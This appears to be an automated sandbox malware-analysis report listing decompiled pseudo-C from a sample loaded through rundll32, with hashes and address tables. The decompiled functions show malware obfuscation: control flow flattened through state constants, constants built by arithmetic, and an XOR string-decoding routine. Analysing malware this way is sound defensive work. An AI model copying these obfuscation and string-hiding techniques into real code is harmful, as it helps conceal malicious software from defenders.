                                                                                                                      0x002c4cb1
                                                                                                                      0x002c4ca9
                                                                                                                      0x002c4c9d
                                                                                                                      0x002c4d85
                                                                                                                      0x002c4d90
                                                                                                                      0x002c4d90
                                                                                                                      0x002c4d37
                                                                                                                      0x002c4d3c
                                                                                                                      0x002c4d3f
                                                                                                                      0x002c4d41
                                                                                                                      0x002c4d4d
                                                                                                                      0x00000000
                                                                                                                      0x002c4d43
                                                                                                                      0x002c4d43
                                                                                                                      0x00000000
                                                                                                                      0x002c4d43
                                                                                                                      0x00000000
                                                                                                                      0x002c4d52
                                                                                                                      0x002c4d52
                                                                                                                      0x002c4d52
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: s
                                                                                                                      • API String ID: 0-1867647943
                                                                                                                      • Opcode ID: 34bd5959cf2d6eb589c4a5b2399f6c39d3f0ab0d666f3f677d61167571982d03
                                                                                                                      • Instruction ID: 4807c5cc0f16afa189cb0aca4f6a496578f6dc0ef5ad3e5a9ddc888059de7998
                                                                                                                      • Opcode Fuzzy Hash: 34bd5959cf2d6eb589c4a5b2399f6c39d3f0ab0d666f3f677d61167571982d03
                                                                                                                      • Instruction Fuzzy Hash: 8351DE712193419FC318EF61D5A5A2BBBE1EFC4708F208A1EF59696260C770CA19CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BE86A Relevance: 1.4, Strings: 1, Instructions: 118COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002BE86A() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _t97;
				signed int _t99;
				intOrPtr _t100;
				void* _t105;
				signed int _t114;
				short* _t117;
				signed int* _t119;

				_t119 =  &_v564;
				_v560 = 0xce5cf0;
				_v560 = _v560 | 0x815fac8b;
				_t105 = 0x687a68b;
				_t114 = 0x3d;
				_v560 = _v560 / _t114;
				_v560 = _v560 ^ 0x02257571;
				_v552 = 0x865242;
				_v552 = _v552 * 0x34;
				_v552 = _v552 >> 6;
				_v552 = _v552 ^ 0x0066bbb6;
				_v524 = 0xc32fa5;
				_v524 = _v524 * 0x41;
				_v524 = _v524 ^ 0x3182565b;
				_v548 = 0xb61c38;
				_v548 = _v548 * 0x62;
				_v548 = _v548 | 0xd3f7f889;
				_v548 = _v548 ^ 0xd7f1c5f5;
				_v536 = 0xb1408a;
				_v536 = _v536 >> 3;
				_v536 = _v536 ^ 0x001ed817;
				_v556 = 0x4c3333;
				_v556 = _v556 + 0xffff679f;
				_v556 = _v556 >> 0xf;
				_v556 = _v556 ^ 0x000b6621;
				_v528 = 0x174ea7;
				_v528 = _v528 >> 8;
				_v528 = _v528 ^ 0x00085e65;
				_v540 = 0x951329;
				_v540 = _v540 ^ 0x02360ba7;
				_v540 = _v540 ^ 0x02aaf891;
				_v564 = 0x7a8127;
				_v564 = _v564 | 0x4a3ea7d2;
				_v564 = _v564 * 0x6d;
				_v564 = _v564 + 0xffffd056;
				_v564 = _v564 ^ 0xb7eba97a;
				_v532 = 0x65650b;
				_t97 = _v532 * 5;
				_v532 = _t97;
				_v532 = _v532 ^ 0x01f4ff6f;
				do {
					while(_t105 != 0xb436d6) {
						if(_t105 == 0x2c7b739) {
							_t100 =  *0x2d520c; // 0x0
							__eflags = _t100 + 0x220;
							return E002C08A0(_t117, _v540, _v564, _t100 + 0x220, _v532);
						}
						if(_t105 == 0x687a68b) {
							_t105 = 0xdf97892;
							continue;
						}
						_t125 = _t105 - 0xdf97892;
						if(_t105 != 0xdf97892) {
							goto L15;
						}
						_t97 = E002D12A8(_t105, _v560, _t125, _v552, _v524,  &_v520);
						_t119 =  &(_t119[3]);
						_t105 = 0xb436d6;
					}
					_v544 = 0xaf74ff;
					_v544 = _v544 + 0xc134;
					_v544 = _v544 ^ 0x00b03631;
					_t99 = E002CBA68(_v548, _v536, _v556,  &_v520, _v528);
					_t119 =  &(_t119[3]);
					_t117 =  &_v520 + _t99 * 2;
					while(1) {
						_t97 =  &_v520;
						__eflags = _t117 - _t97;
						if(_t117 <= _t97) {
							break;
						}
						__eflags =  *_t117 - 0x5c;
						if( *_t117 != 0x5c) {
							L10:
							_t117 = _t117 - 2;
							__eflags = _t117;
							continue;
						}
						_t85 =  &_v544;
						 *_t85 = _v544 - 1;
						__eflags =  *_t85;
						if( *_t85 == 0) {
							__eflags = _t117;
							L14:
							_t105 = 0x2c7b739;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t105 - 0x787a9f3;
				} while (__eflags != 0);
				return _t97;
			}






















                                                                                                                      0x002be86a
                                                                                                                      0x002be870
                                                                                                                      0x002be87a
                                                                                                                      0x002be882
                                                                                                                      0x002be891
                                                                                                                      0x002be89e
                                                                                                                      0x002be8a7
                                                                                                                      0x002be8af
                                                                                                                      0x002be8bc
                                                                                                                      0x002be8c0
                                                                                                                      0x002be8c5
                                                                                                                      0x002be8cd
                                                                                                                      0x002be8da
                                                                                                                      0x002be8de
                                                                                                                      0x002be8e6
                                                                                                                      0x002be8f3
                                                                                                                      0x002be8f7
                                                                                                                      0x002be8ff
                                                                                                                      0x002be907
                                                                                                                      0x002be90f
                                                                                                                      0x002be914
                                                                                                                      0x002be91c
                                                                                                                      0x002be924
                                                                                                                      0x002be92c
                                                                                                                      0x002be931
                                                                                                                      0x002be939
                                                                                                                      0x002be941
                                                                                                                      0x002be946
                                                                                                                      0x002be94e
                                                                                                                      0x002be956
                                                                                                                      0x002be95e
                                                                                                                      0x002be966
                                                                                                                      0x002be96e
                                                                                                                      0x002be97f
                                                                                                                      0x002be983
                                                                                                                      0x002be98b
                                                                                                                      0x002be993
                                                                                                                      0x002be99b
                                                                                                                      0x002be9a0
                                                                                                                      0x002be9a4
                                                                                                                      0x002be9ac
                                                                                                                      0x002be9ac
                                                                                                                      0x002be9b2
                                                                                                                      0x002bea53
                                                                                                                      0x002bea5a
                                                                                                                      0x00000000
                                                                                                                      0x002bea6d
                                                                                                                      0x002be9be
                                                                                                                      0x002be9e1
                                                                                                                      0x00000000
                                                                                                                      0x002be9e1
                                                                                                                      0x002be9c0
                                                                                                                      0x002be9c2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002be9d5
                                                                                                                      0x002be9da
                                                                                                                      0x002be9dd
                                                                                                                      0x002be9dd
                                                                                                                      0x002be9e5
                                                                                                                      0x002be9f1
                                                                                                                      0x002be9f9
                                                                                                                      0x002bea12
                                                                                                                      0x002bea1b
                                                                                                                      0x002bea1e
                                                                                                                      0x002bea32
                                                                                                                      0x002bea32
                                                                                                                      0x002bea36
                                                                                                                      0x002bea38
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002bea23
                                                                                                                      0x002bea27
                                                                                                                      0x002bea2f
                                                                                                                      0x002bea2f
                                                                                                                      0x002bea2f
                                                                                                                      0x00000000
                                                                                                                      0x002bea2f
                                                                                                                      0x002bea29
                                                                                                                      0x002bea29
                                                                                                                      0x002bea29
                                                                                                                      0x002bea2d
                                                                                                                      0x002bea3c
                                                                                                                      0x002bea3f
                                                                                                                      0x002bea3f
                                                                                                                      0x00000000
                                                                                                                      0x002bea3f
                                                                                                                      0x00000000
                                                                                                                      0x002bea2d
                                                                                                                      0x00000000
                                                                                                                      0x002bea41
                                                                                                                      0x002bea41
                                                                                                                      0x002bea41
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 33L
                                                                                                                      • API String ID: 0-1382935120
                                                                                                                      • Opcode ID: 3ed81fb55678b2904ab08b893e38d90eb4dc865844257a74deeb17f7ec9b7fb5
                                                                                                                      • Instruction ID: b5559c48b73e5b86e928d580dcda6bb51fa08e2a8c54231966474c21894689b5
                                                                                                                      • Opcode Fuzzy Hash: 3ed81fb55678b2904ab08b893e38d90eb4dc865844257a74deeb17f7ec9b7fb5
                                                                                                                      • Instruction Fuzzy Hash: 7A5164715183419BC788CF24C58A46FBBE4FFC4348F509A1DF9D696220D3709A59CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C0D33 Relevance: 1.4, Strings: 1, Instructions: 111COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E002C0D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t64;
				void* _t81;
				void* _t85;
				signed int _t94;
				signed int _t95;
				void* _t97;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002BCF25(_t64);
				_v20 = 0xc35745;
				_t97 = 0;
				_t81 = 0xe709e41;
				_t94 = 0x4c;
				_v20 = _v20 / _t94;
				_v20 = _v20 ^ 0x00058dee;
				_v24 = 0xf1d8fd;
				_v24 = _v24 + 0xffffe7cd;
				_v24 = _v24 + 0xffff1b1a;
				_v24 = _v24 << 0xc;
				_v24 = _v24 ^ 0x0dbd879b;
				_v28 = 0xdb2a24;
				_v28 = _v28 + 0x4b2b;
				_v28 = _v28 | 0xa0f26509;
				_v28 = _v28 + 0x79c0;
				_v28 = _v28 ^ 0xa0fe0b2f;
				_v4 = 0xb750f2;
				_v4 = _v4 >> 0xe;
				_v4 = _v4 ^ 0x000727f7;
				_v8 = 0x72e718;
				_t95 = 0x6b;
				_v8 = _v8 / _t95;
				_v8 = _v8 ^ 0x00056d3a;
				_v12 = 0x47eeb9;
				_v12 = _v12 + 0xffffe987;
				_v12 = _v12 ^ 0x0043781c;
				_v16 = 0xdf1994;
				_v16 = _v16 + 0xffff4376;
				_v16 = _v16 ^ 0x00d54791;
				do {
					while(_t81 != 0x3b92be8) {
						if(_t81 == 0x73b901c) {
							E002D3672();
							_t81 = 0xe212545;
							continue;
						} else {
							if(_t81 == 0x9bcb632) {
								if(E002CACD3(_a8) != 0) {
									_t97 = 1;
								} else {
									_t81 = 0x73b901c;
									continue;
								}
							} else {
								if(_t81 == 0xe212545) {
									E002B68DE(_v4, _v8, _v12, _v16,  *0x2d5c9c);
								} else {
									if(_t81 != 0xe709e41) {
										goto L13;
									} else {
										_push(_t81);
										_push(_t81);
										_t85 = 0x60;
										 *0x2d5c9c = E002C3512(_t85);
										_t81 = 0x3b92be8;
										continue;
									}
								}
							}
						}
						L17:
						return _t97;
					}
					if(E002B9A7D(_a12) == 0) {
						_t81 = 0xe212545;
						goto L13;
					} else {
						_t81 = 0x9bcb632;
						continue;
					}
					goto L17;
					L13:
				} while (_t81 != 0xf0e3ed);
				goto L17;
			}
















                                                                                                                      0x002c0d3a
                                                                                                                      0x002c0d3e
                                                                                                                      0x002c0d42
                                                                                                                      0x002c0d47
                                                                                                                      0x002c0d48
                                                                                                                      0x002c0d4d
                                                                                                                      0x002c0d5e
                                                                                                                      0x002c0d60
                                                                                                                      0x002c0d71
                                                                                                                      0x002c0d76
                                                                                                                      0x002c0d7c
                                                                                                                      0x002c0d84
                                                                                                                      0x002c0d8c
                                                                                                                      0x002c0d94
                                                                                                                      0x002c0d9c
                                                                                                                      0x002c0da1
                                                                                                                      0x002c0da9
                                                                                                                      0x002c0db1
                                                                                                                      0x002c0db9
                                                                                                                      0x002c0dc1
                                                                                                                      0x002c0dc9
                                                                                                                      0x002c0dd1
                                                                                                                      0x002c0dd9
                                                                                                                      0x002c0dde
                                                                                                                      0x002c0de6
                                                                                                                      0x002c0df2
                                                                                                                      0x002c0dfa
                                                                                                                      0x002c0dfe
                                                                                                                      0x002c0e06
                                                                                                                      0x002c0e0e
                                                                                                                      0x002c0e16
                                                                                                                      0x002c0e1e
                                                                                                                      0x002c0e26
                                                                                                                      0x002c0e2e
                                                                                                                      0x002c0e36
                                                                                                                      0x002c0e36
                                                                                                                      0x002c0e40
                                                                                                                      0x002c0e87
                                                                                                                      0x002c0e8c
                                                                                                                      0x00000000
                                                                                                                      0x002c0e42
                                                                                                                      0x002c0e44
                                                                                                                      0x002c0e81
                                                                                                                      0x002c0ecf
                                                                                                                      0x002c0e83
                                                                                                                      0x002c0e83
                                                                                                                      0x00000000
                                                                                                                      0x002c0e83
                                                                                                                      0x002c0e46
                                                                                                                      0x002c0e48
                                                                                                                      0x002c0ec3
                                                                                                                      0x002c0e4a
                                                                                                                      0x002c0e50
                                                                                                                      0x00000000
                                                                                                                      0x002c0e52
                                                                                                                      0x002c0e5e
                                                                                                                      0x002c0e5f
                                                                                                                      0x002c0e62
                                                                                                                      0x002c0e6a
                                                                                                                      0x002c0e6f
                                                                                                                      0x00000000
                                                                                                                      0x002c0e6f
                                                                                                                      0x002c0e50
                                                                                                                      0x002c0e48
                                                                                                                      0x002c0e44
                                                                                                                      0x002c0ed1
                                                                                                                      0x002c0ed9
                                                                                                                      0x002c0ed9
                                                                                                                      0x002c0e9b
                                                                                                                      0x002c0ea1
                                                                                                                      0x00000000
                                                                                                                      0x002c0e9d
                                                                                                                      0x002c0e9d
                                                                                                                      0x00000000
                                                                                                                      0x002c0e9d
                                                                                                                      0x00000000
                                                                                                                      0x002c0ea3
                                                                                                                      0x002c0ea3
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: +K
                                                                                                                      • API String ID: 0-3601299342
                                                                                                                      • Opcode ID: 3cd54db39f41048f58c776fba22fa38b849857b225207553149cd7c112b456fc
                                                                                                                      • Instruction ID: ee7d1d019d54ea16cb58b19dc958d6088a25214943277de29e22d4aec4897328
                                                                                                                      • Opcode Fuzzy Hash: 3cd54db39f41048f58c776fba22fa38b849857b225207553149cd7c112b456fc
                                                                                                                      • Instruction Fuzzy Hash: 1441FF72628301DBC758CF25C885A2FBBE1EBD8318F108E1DF59656260D3B0C919CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BAB66 Relevance: 1.3, Strings: 1, Instructions: 93COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E002BAB66(void* __ecx, void* __edx, void* __eflags) {
				void* _t42;
				signed int _t46;
				short* _t63;
				signed int _t64;
				signed int _t66;
				signed int _t74;
				unsigned int _t75;
				unsigned int _t76;
				short* _t79;
				signed int* _t80;
				signed int* _t81;
				signed int* _t82;
				unsigned int _t84;
				void* _t90;
				short _t92;
				void* _t94;
				void* _t95;

				_t82 =  *(_t94 + 0x1c);
				_push( *(_t94 + 0x28));
				_push( *(_t94 + 0x28));
				_push(_t82);
				_push(__ecx);
				E002BCF25(_t42);
				 *(_t94 + 0x24) = 0xc8fa9a;
				_t80 =  &(_t82[1]);
				 *(_t94 + 0x24) =  *(_t94 + 0x24) + 0x149f;
				 *(_t94 + 0x24) =  *(_t94 + 0x24) ^ 0x00c381cf;
				 *(_t94 + 0x34) = 0x8cac1;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) | 0xffff7fdf;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) ^ 0xfffda11e;
				 *(_t94 + 0x20) = 0x3c356c;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) * 0x2a;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0x83f9;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) ^ 0x09ee4754;
				_t66 =  *_t82;
				_t81 =  &(_t80[1]);
				_t46 =  *_t80 ^ _t66;
				 *(_t94 + 0x28) = _t66;
				 *(_t94 + 0x2c) = _t46;
				_t24 = _t46 + 1; // 0x3c356d
				_t84 =  !=  ? (_t24 & 0xfffffffc) + 4 : _t24;
				_t95 = _t94 + 0xc;
				_t63 = E002C3512(_t84 + _t84);
				 *((intOrPtr*)(_t95 + 0x28)) = _t63;
				if(_t63 != 0) {
					_t92 = 0;
					_t79 = _t63;
					_t90 =  >  ? 0 :  &(_t81[_t84 >> 2]) - _t81 + 3 >> 2;
					if(_t90 != 0) {
						_t64 =  *(_t95 + 0x18);
						do {
							_t74 =  *_t81;
							_t81 =  &(_t81[1]);
							_t75 = _t74 ^ _t64;
							 *_t79 = _t75 & 0x000000ff;
							_t79 = _t79 + 8;
							 *((short*)(_t79 - 6)) = _t75 >> 0x00000008 & 0x000000ff;
							_t76 = _t75 >> 0x10;
							_t92 = _t92 + 1;
							 *((short*)(_t79 - 4)) = _t76 & 0x000000ff;
							 *((short*)(_t79 - 2)) = _t76 >> 0x00000008 & 0x000000ff;
						} while (_t92 < _t90);
						_t63 =  *((intOrPtr*)(_t95 + 0x24));
					}
					 *((short*)(_t63 +  *(_t95 + 0x1c) * 2)) = 0;
				}
				return _t63;
			}




















                                                                                                                      0x002bab6b
                                                                                                                      0x002bab70
                                                                                                                      0x002bab74
                                                                                                                      0x002bab78
                                                                                                                      0x002bab7a
                                                                                                                      0x002bab7b
                                                                                                                      0x002bab80
                                                                                                                      0x002bab88
                                                                                                                      0x002bab8b
                                                                                                                      0x002bab93
                                                                                                                      0x002bab9b
                                                                                                                      0x002baba3
                                                                                                                      0x002babab
                                                                                                                      0x002babb3
                                                                                                                      0x002babc0
                                                                                                                      0x002babc4
                                                                                                                      0x002babcc
                                                                                                                      0x002babd4
                                                                                                                      0x002babd8
                                                                                                                      0x002babdb
                                                                                                                      0x002babdd
                                                                                                                      0x002babe1
                                                                                                                      0x002babe5
                                                                                                                      0x002babf5
                                                                                                                      0x002bac00
                                                                                                                      0x002bac0f
                                                                                                                      0x002bac11
                                                                                                                      0x002bac19
                                                                                                                      0x002bac21
                                                                                                                      0x002bac23
                                                                                                                      0x002bac34
                                                                                                                      0x002bac39
                                                                                                                      0x002bac3b
                                                                                                                      0x002bac3f
                                                                                                                      0x002bac3f
                                                                                                                      0x002bac41
                                                                                                                      0x002bac44
                                                                                                                      0x002bac49
                                                                                                                      0x002bac51
                                                                                                                      0x002bac57
                                                                                                                      0x002bac5b
                                                                                                                      0x002bac64
                                                                                                                      0x002bac65
                                                                                                                      0x002bac6c
                                                                                                                      0x002bac70
                                                                                                                      0x002bac74
                                                                                                                      0x002bac74
                                                                                                                      0x002bac7f
                                                                                                                      0x002bac7f
                                                                                                                      0x002bac8b

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: TG
                                                                                                                      • API String ID: 0-2762469129
                                                                                                                      • Opcode ID: de49195854164d4ba6e370293f3bba852aaf4d501735938fb8aa480511fba751
                                                                                                                      • Instruction ID: 5c93e8545078b4875401e9b58d4647380903f34c94967df8e7b3d10c0e3223a3
                                                                                                                      • Opcode Fuzzy Hash: de49195854164d4ba6e370293f3bba852aaf4d501735938fb8aa480511fba751
                                                                                                                      • Instruction Fuzzy Hash: B6317E726193118BC714DF28C48546AFBE0FF88718F454B2EF889A7250D774EA19CB9A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C109E Relevance: 1.3, Strings: 1, Instructions: 87COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002C109E(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t76;
				void* _t82;
				void* _t83;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				void* _t96;
				void* _t97;
				signed int* _t99;

				_t99 =  &_v28;
				_v24 = 0xd283c4;
				_v24 = _v24 >> 8;
				_v24 = _v24 << 9;
				_t83 = __ecx;
				_t96 = 0;
				_t85 = 0x2d;
				_v24 = _v24 / _t85;
				_v24 = _v24 ^ 0x0004da81;
				_t97 = 0xc7350e4;
				_v16 = 0x64139d;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x00062b71;
				_v28 = 0xade301;
				_v28 = _v28 ^ 0x8f618bae;
				_v28 = _v28 >> 4;
				_t86 = 0x7e;
				_v28 = _v28 / _t86;
				_v28 = _v28 ^ 0x001433c5;
				_v20 = 0x6fd8b7;
				_v20 = _v20 << 5;
				_t87 = 0x39;
				_v20 = _v20 / _t87;
				_v20 = _v20 ^ 0x003ef69f;
				_v4 = 0x5f989c;
				_v4 = _v4 + 0xda74;
				_v4 = _v4 ^ 0x006bc492;
				_v12 = 0x987d41;
				_v12 = _v12 << 9;
				_v12 = _v12 + 0x3c41;
				_v12 = _v12 ^ 0x30fa219f;
				_v8 = 0x945ab1;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x002dcc5b;
				do {
					while(_t97 != 0xa0feddc) {
						if(_t97 == 0xc7350e4) {
							_t97 = 0xf55d56d;
							continue;
						} else {
							if(_t97 == 0xf55d56d) {
								_t82 = E002C274F();
								_t99 = _t99 - 0xc + 0xc;
								_t97 = 0xa0feddc;
								_t96 = _t96 + _t82;
								continue;
							}
						}
						goto L7;
					}
					_t76 = E002BB782(_t83 + 4, _v4, _v12, _v8);
					_t99 =  &(_t99[2]);
					_t97 = 0x490b4c9;
					_t96 = _t96 + _t76;
					L7:
				} while (_t97 != 0x490b4c9);
				return _t96;
			}



















                                                                                                                      0x002c109e
                                                                                                                      0x002c10a1
                                                                                                                      0x002c10ab
                                                                                                                      0x002c10b0
                                                                                                                      0x002c10bf
                                                                                                                      0x002c10c1
                                                                                                                      0x002c10c3
                                                                                                                      0x002c10c8
                                                                                                                      0x002c10ce
                                                                                                                      0x002c10d6
                                                                                                                      0x002c10db
                                                                                                                      0x002c10e8
                                                                                                                      0x002c10ed
                                                                                                                      0x002c10f2
                                                                                                                      0x002c10fa
                                                                                                                      0x002c1102
                                                                                                                      0x002c110a
                                                                                                                      0x002c1113
                                                                                                                      0x002c1118
                                                                                                                      0x002c111e
                                                                                                                      0x002c1126
                                                                                                                      0x002c112e
                                                                                                                      0x002c1137
                                                                                                                      0x002c113a
                                                                                                                      0x002c113e
                                                                                                                      0x002c1146
                                                                                                                      0x002c114e
                                                                                                                      0x002c1156
                                                                                                                      0x002c115e
                                                                                                                      0x002c1166
                                                                                                                      0x002c116b
                                                                                                                      0x002c1173
                                                                                                                      0x002c117b
                                                                                                                      0x002c1183
                                                                                                                      0x002c1188
                                                                                                                      0x002c1190
                                                                                                                      0x002c1190
                                                                                                                      0x002c119e
                                                                                                                      0x002c11c8
                                                                                                                      0x00000000
                                                                                                                      0x002c11a0
                                                                                                                      0x002c11a2
                                                                                                                      0x002c11b7
                                                                                                                      0x002c11bc
                                                                                                                      0x002c11bf
                                                                                                                      0x002c11c4
                                                                                                                      0x00000000
                                                                                                                      0x002c11c4
                                                                                                                      0x002c11a2
                                                                                                                      0x00000000
                                                                                                                      0x002c119e
                                                                                                                      0x002c11db
                                                                                                                      0x002c11e0
                                                                                                                      0x002c11e3
                                                                                                                      0x002c11e8
                                                                                                                      0x002c11ea
                                                                                                                      0x002c11ea
                                                                                                                      0x002c11fb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A<
                                                                                                                      • API String ID: 0-2278821948
                                                                                                                      • Opcode ID: 97b66c1337cb10c1d396c65a6684b4c2d0d3bf5368e036497ae656dbc9f15019
                                                                                                                      • Instruction ID: ac27bc7337bcdf5bfdc176bc645ef751f26d01682c1e357ff20032b80761f2f1
                                                                                                                      • Opcode Fuzzy Hash: 97b66c1337cb10c1d396c65a6684b4c2d0d3bf5368e036497ae656dbc9f15019
                                                                                                                      • Instruction Fuzzy Hash: 0A318D729183018FC304DE25D84941BBBE1FBD4B58F148A2DF588AB265D3B5DE28CB97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B8650 Relevance: 1.3, Strings: 1, Instructions: 86COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E002B8650(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* _t83;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				signed int _t105;
				void* _t118;
				signed int _t119;

				_push(_a4);
				_t118 = __edx;
				_push(__edx);
				E002BCF25(_t83);
				_v36 = _v36 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_v40 = 0x27bdd4;
				_v24 = 0x769f2a;
				_v24 = _v24 << 1;
				_v24 = _v24 ^ 0x00e6321c;
				_v8 = 0xfef45c;
				_t102 = 0x31;
				_v8 = _v8 / _t102;
				_v8 = _v8 | 0xf1ae833d;
				_v8 = _v8 ^ 0x9231f40a;
				_v8 = _v8 ^ 0x6392d2fe;
				_v16 = 0x3d43fb;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x97e6d5b2;
				_v16 = _v16 ^ 0x97eefe03;
				_v12 = 0x33c712;
				_v12 = _v12 >> 7;
				_v12 = _v12 + 0x2d9c;
				_t103 = 0x16;
				_v12 = _v12 / _t103;
				_v12 = _v12 ^ 0x00054cf8;
				_v28 = 0xb0e606;
				_v28 = _v28 | 0xfcdd39f2;
				_v28 = _v28 * 0x19;
				_v28 = _v28 ^ 0xb4c190eb;
				E002B5AE2(_t103);
				_v24 = 0x8c0b06;
				_v24 = _v24 + 0x3875;
				_v24 = _v24 ^ 0xc8b8cfa1;
				_v24 = _v24 ^ 0xc8348cde;
				_v20 = 0xa003e6;
				_t104 = 0x69;
				_v20 = _v20 / _t104;
				_t105 = 0x51;
				_v20 = _v20 / _t105;
				_v20 = _v20 ^ 0x000004c1;
				_t119 = E002BEF71(_v24, _v20);
				_push(_t119);
				_push(_v28);
				_push(_t118);
				E002B5A07(1, _v12);
				 *((short*)(_t118 + _t119 * 2)) = 0;
				return 0;
			}



















                                                                                                                      0x002b8658
                                                                                                                      0x002b865b
                                                                                                                      0x002b865d
                                                                                                                      0x002b865f
                                                                                                                      0x002b8664
                                                                                                                      0x002b866a
                                                                                                                      0x002b866e
                                                                                                                      0x002b8675
                                                                                                                      0x002b867c
                                                                                                                      0x002b867f
                                                                                                                      0x002b8686
                                                                                                                      0x002b8692
                                                                                                                      0x002b8697
                                                                                                                      0x002b869c
                                                                                                                      0x002b86a3
                                                                                                                      0x002b86aa
                                                                                                                      0x002b86b1
                                                                                                                      0x002b86b8
                                                                                                                      0x002b86bc
                                                                                                                      0x002b86c3
                                                                                                                      0x002b86ca
                                                                                                                      0x002b86d1
                                                                                                                      0x002b86d5
                                                                                                                      0x002b86df
